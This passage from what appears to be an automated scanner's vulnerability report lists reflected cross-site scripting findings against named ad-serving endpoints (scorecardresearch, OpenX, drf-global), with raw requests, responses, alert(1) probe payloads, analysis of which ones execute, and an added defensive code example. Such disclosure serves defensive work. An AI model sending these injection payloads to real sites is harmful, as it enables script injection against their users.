The value of the c4 request parameter is echoed, unencoded, into a JavaScript response (Content-Type: application/x-javascript), inside the double-quoted string literal of the c4 property in the COMSCORE.beacon({...}) call. The payload d5d70<script>alert(1)</script>e85dc046e5c was submitted in the c4 parameter and appears unmodified in the response.

This shows unencoded reflection into a script context, not script execution: a <script> tag inside a JavaScript string literal is inert, and a response served as application/x-javascript is not parsed as HTML when it is loaded directly. Breaking out of the string would require a raw " or \ to be reflected as well, which this probe does not test.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=d5d70<script>alert(1)</script>e85dc046e5c&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:52 GMT
Date: Sun, 02 Oct 2011 23:52:52 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"d5d70<script>alert(1)</script>e85dc046e5c", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.44. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is echoed, unencoded, into a JavaScript response (Content-Type: application/x-javascript), inside the double-quoted string literal of the c5 property in the COMSCORE.beacon({...}) call. The payload 24b3b<script>alert(1)</script>279d6872fb9 was submitted in the c5 parameter and appears unmodified in the response.

This shows unencoded reflection into a script context, not script execution: a <script> tag inside a JavaScript string literal is inert, and a response served as application/x-javascript is not parsed as HTML when it is loaded directly. Breaking out of the string would require a raw " or \ to be reflected as well, which this probe does not test.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=24b3b<script>alert(1)</script>279d6872fb9&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:52 GMT
Date: Sun, 02 Oct 2011 23:52:52 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"24b3b<script>alert(1)</script>279d6872fb9", c6:"", c10:"", c15:"", c16:"", r:""});



4.45. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is echoed, unencoded, into a JavaScript response (Content-Type: application/x-javascript), inside the double-quoted string literal of the c6 property in the COMSCORE.beacon({...}) call. The payload 6e3ec<script>alert(1)</script>d0298376d15 was submitted in the c6 parameter and appears unmodified in the response.

This shows unencoded reflection into a script context, not script execution: a <script> tag inside a JavaScript string literal is inert, and a response served as application/x-javascript is not parsed as HTML when it is loaded directly. Breaking out of the string would require a raw " or \ to be reflected as well, which this probe does not test.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=&c6=6e3ec<script>alert(1)</script>d0298376d15&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:53 GMT
Date: Sun, 02 Oct 2011 23:52:53 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"", c6:"6e3ec<script>alert(1)</script>d0298376d15", c10:"", c15:"", c16:"", r:""});



4.46. http://bid.openx.net/json [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is used as the JSONP callback name in a JavaScript response (Content-Type: text/javascript; charset=utf-8). The payload a5007<script>alert(1)</script>25b039ed36e was submitted in the c parameter and is echoed unmodified as the prefix of the function call that wraps the JSON body.

The response is a script, not an HTML document, so the <script> tags in the payload are not interpreted as markup and this particular payload does not run; what the probe establishes is that the callback name is not validated. That is still worth fixing: a JSONP endpoint with an unrestricted callback lets an attacker choose the leading text of a script served from this host, which matters to any page whose script-src policy trusts the host, and older browsers that sniff content types could treat a direct navigation to this URL as HTML.

Request

GET /json?c=OXM_23202976328a5007<script>alert(1)</script>25b039ed36e&pid=c8eddb4a-d9d5-0c5b-6e12-562295aa26ea&s=728x90&f=1.3&url=http%3A%2F%2Fwww.goal.com%2Fen%2Fteams%2Fengland%2F97%2Fman-utd-news&cid=oxpv1%3A34-632-1929-2254-6393&hrid=77e73cd01694ae3edcb772febdf4acd1-1317599425 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1317129774; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache

OXM_23202976328a5007<script>alert(1)</script>25b039ed36e({"r":null});

4.47. http://d.tradex.openx.com/afr.php [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the cb request parameter is copied into the page's refresh script, inside a double-quoted URL that is itself the content of the single-quoted string passed to setTimeout(). The payload ca534</script><script>alert(1)</script>a6853b22006 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This one executes in a browser: the response is text/html, and the HTML tokenizer ends a <script> element at the first </script it encounters regardless of JavaScript quoting, so the nested quotes around the URL offer no protection. The original script element is left with an unterminated string and fails to compile, the injected <script>alert(1)</script> compiles and runs on its own, and the remainder of the original line becomes page text.

Note that a redirection occurred between the attack request and the response containing the echoed input. The redirection must be followed for the attack to succeed; a browser follows it automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HEREca534</script><script>alert(1)</script>a6853b22006 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:54:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%5D%5D%3E%3E; expires=Mon, 01-Oct-2012 23:54:23 GMT; path=/
Content-Length: 2791
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HEREca534</script><script>alert(1)</script>a6853b22006&loc=")', 40000);
// ]]>
...[SNIP]...

4.48. http://d.tradex.openx.com/afr.php [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the loc request parameter is copied into the page's refresh script, inside a double-quoted URL that is itself the content of the single-quoted string passed to setTimeout(). The payload 55a13</script><script>alert(1)</script>3f8ba84e66c was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This one executes in a browser: the response is text/html, and the HTML tokenizer ends a <script> element at the first </script it encounters regardless of JavaScript quoting, so the nested quotes around the URL offer no protection. The original script element is left with an unterminated string and fails to compile, the injected <script>alert(1)</script> compiles and runs on its own, and the remainder of the original line becomes page text.

Note that a redirection occurred between the attack request and the response containing the echoed input. The redirection must be followed for the attack to succeed; a browser follows it automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=55a13</script><script>alert(1)</script>3f8ba84e66c HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0; __utma=20948333.858847159.1317599444.1317599444.1317599444.1; __utmb=20948333.6.6.1317599444; __utmc=20948333; __utmz=20948333.1317599444.1.1.utmcsr=goal.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/teams/england/97/man-utd-news; __qca=P0-1745582797-1317599446738; __csref=http%3A%2F%2Fwww.goal.com%2Fen%2Fteams%2Fengland%2F97%2Fman-utd-news

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%27; expires=Mon, 01-Oct-2012 23:57:23 GMT; path=/
Content-Length: 3019
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=55a13</script><script>alert(1)</script>3f8ba84e66c")', 40000);
// ]]>
...[SNIP]...

4.49. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the page's refresh script, inside a double-quoted URL that is itself the content of the single-quoted string passed to setTimeout(); the endpoint rebuilds the entire query string into that URL, so every parameter name and value is reflected, not only the ones it recognises. The payload c5849</script><script>alert(1)</script>2ba89ba78d was submitted as the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This one executes in a browser: the response is text/html, and the HTML tokenizer ends a <script> element at the first </script it encounters regardless of JavaScript quoting, so the nested quotes around the URL offer no protection. The original script element is left with an unterminated string and fails to compile, the injected <script>alert(1)</script> compiles and runs on its own, and the remainder of the original line becomes page text.

Note that a redirection occurred between the attack request and the response containing the echoed input. The redirection must be followed for the attack to succeed; a browser follows it automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&c5849</script><script>alert(1)</script>2ba89ba78d=1 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:55:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%27; expires=Mon, 01-Oct-2012 23:55:30 GMT; path=/
Content-Length: 2795
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&c5849</script><script>alert(1)</script>2ba89ba78d=1&loc=")', 40000);
// ]]>
...[SNIP]...

4.50. http://d.tradex.openx.com/afr.php [zoneid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the zoneid request parameter is copied into the page's refresh script, inside a double-quoted URL that is itself the content of the single-quoted string passed to setTimeout(). The payload 713c9</script><script>alert(1)</script>3b14e1cb0e2 was submitted in the zoneid parameter. This input was echoed unmodified in the application's response.

This one executes in a browser: the response is text/html, and the HTML tokenizer ends a <script> element at the first </script it encounters regardless of JavaScript quoting, so the nested quotes around the URL offer no protection. The original script element is left with an unterminated string and fails to compile, the injected <script>alert(1)</script> compiles and runs on its own, and the remainder of the original line becomes page text.

Note that a redirection occurred between the attack request and the response containing the echoed input. The redirection must be followed for the attack to succeed; a browser follows it automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=6511713c9</script><script>alert(1)</script>3b14e1cb0e2&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%5D%5D%3E%3E; expires=Mon, 01-Oct-2012 23:53:21 GMT; path=/
Content-Length: 853
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511713c9</script><script>alert(1)</script>3b14e1cb0e2&cb=INSERT_RANDOM_NUMBER_HERE&loc=")', 40000);
// ]]>
...[SNIP]...
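The remediation paragraphs in 4.46 through 4.50 say to keep user data out of script contexts. Where a JSONP callback name or a value inside an inline <script> cannot be avoided, the following added example shows the two safe patterns: validate the callback against an identifier grammar and fall back to a fixed name, and embed values only as JSON-encoded string literals with < escaped, passed to a real function rather than concatenated into a string that setTimeout evaluates. This is the editor's own code, not code from OpenX or from the report; the function names, the fallback callback name OXM_callback and the sample values are assumptions, and only the afr.php host and its parameter names are taken from the findings above.

```javascript
// Added example (editor's own code, not from OpenX or the XSS.CX report):
// two safe patterns for the script-context reflections seen in 4.46-4.50.

// 1. JSONP: the callback name must be a plain JavaScript identifier path.
//    Anything else (e.g. "OXM_x<script>alert(1)</script>") is rejected and a
//    fixed fallback name is used instead of echoing the caller's text.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function jsonpResponse(callbackParam, data, fallback = 'OXM_callback') {
  const name = CALLBACK_RE.test(callbackParam || '') ? callbackParam : fallback;
  // JSON.stringify yields a valid JS literal; U+2028/U+2029 are legal inside
  // JSON strings but were line terminators in JS before ES2019, so escape them.
  const body = JSON.stringify(data)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return `${name}(${body});`;
}

// 2. A value embedded in an inline <script>: encode it as a JS string literal
//    and additionally escape "<", so "</script>" can never appear in the script
//    body whatever the value contains. The HTML tokenizer closes a <script>
//    element at the first "</script" regardless of JavaScript quoting, which
//    is exactly what the afr.php findings exploit.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// The afr.php refresh logic without string-eval: query values are URL-encoded
// when the URL is rebuilt, and the URL reaches the script only as a literal
// argument to a real function (hypothetical rewrite; host from the report).
function refreshScript(zoneid, cb, loc, delayMs) {
  const qs = new URLSearchParams({ refresh: String(delayMs / 1000), zoneid, cb, loc }).toString();
  const url = 'http://d.tradex.openx.com/afr.php?' + qs;
  return '<script type="text/javascript">\n' +
    `setTimeout(function () { window.location.replace(${jsStringLiteral(url)}); }, ${Number(delayMs)});\n` +
    '</script>';
}

// Counts "</script" occurrences: a safe inline script has exactly one, its own
// closing tag.
function scriptCloserCount(html) {
  return (html.match(/<\/script/gi) || []).length;
}
```

The callback check deliberately rejects anything that is not an identifier path rather than trying to encode it: a JSONP prefix is code by definition, so the only safe policy is an allowlist. The URL encoding in refreshScript already removes every < from the value; jsStringLiteral escapes it again so the script body stays safe even if a later change drops the encoding step.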

4.51. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The value of the mid request parameter is echoed, unencoded, into a JavaScript response (Content-Type: text/javascript;charset=UTF-8) in several places at once: as part of the declared function name Miwe1..., in the two prototype assignments, inside the double-quoted string key of window["miwe1..."], and in the new Miwe1...() call. The payload a4765"%3balert(1)//842209825e9 was submitted in the mid parameter and echoed as a4765";alert(1)//842209825e9 at each of those points.

The payload was built for the double-quoted string context, but the first reflection is in a function declaration, where the " makes the whole file a syntax error; a browser therefore compiles none of it and alert(1) never runs. The reflection is real and unencoded, but a working attack would need a value that is valid JavaScript in every reflection context simultaneously, and this probe does not establish that such a value exists.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=1a4765"%3balert(1)//842209825e9&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:04 GMT
Server: Apache
Set-Cookie: JSESSIONID=9AE5B1EE946FD6F0C0A430487526B06D.p0529; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.63
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4620

function Miwe1a4765";alert(1)//842209825e9() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/cl
...[SNIP]...
       },
       search: {
           type: "JS_OBJECT",
           uid: "9484261c-5e39-4ffd-a8b2-5f3e43a6e87f"
       }
   }
}
Miwe1a4765";alert(1)//842209825e9.prototype.getParts = function() {
return this.parts;
}
Miwe1a4765";alert(1)//842209825e9.prototype.getPart = function(id) {
return this.parts[id];
}
window["miwe1a4765";alert(1)//842209825e9"] = new Miwe1a4765";alert(1)//842209825e9();


4.52. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The value of the mid request parameter is echoed, unencoded, into the JavaScript response as part of a declared function name (function Miwe1...() {) and, further down, wherever that name is repeated. The payload e7d70%3balert(1)//b2842205c0b was submitted in the mid parameter and echoed as e7d70;alert(1)//b2842205c0b.

A function declaration must be followed by a parameter list, so function Miwe1e7d70;alert(1)//... is a syntax error and the whole file fails to compile; alert(1) does not run. The reflection is unencoded, but the probe does not demonstrate a payload that is valid JavaScript at every point where mid is echoed, which is what an actual attack would require.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=1e7d70%3balert(1)//b2842205c0b&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:05 GMT
Server: Apache
Set-Cookie: JSESSIONID=F5E192AC799744E1978CC2777215B349.p0523; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.57
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4615

function Miwe1e7d70;alert(1)//b2842205c0b() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http://www.orbitz.co
...[SNIP]...

4.53. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The value of the mid request parameter is echoed, unencoded, into the JavaScript response as part of a declared function name (function Miwe0...() {). The payload ffe58%3balert(1)//d4209f9fb72 was submitted in the mid parameter and echoed as ffe58;alert(1)//d4209f9fb72.

A function declaration must be followed by a parameter list, so function Miwe0ffe58;alert(1)//... is a syntax error and the whole file fails to compile; alert(1) does not run. The reflection is unencoded, but the probe does not demonstrate a payload that is valid JavaScript at every point where mid is echoed, which is what an actual attack would require.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

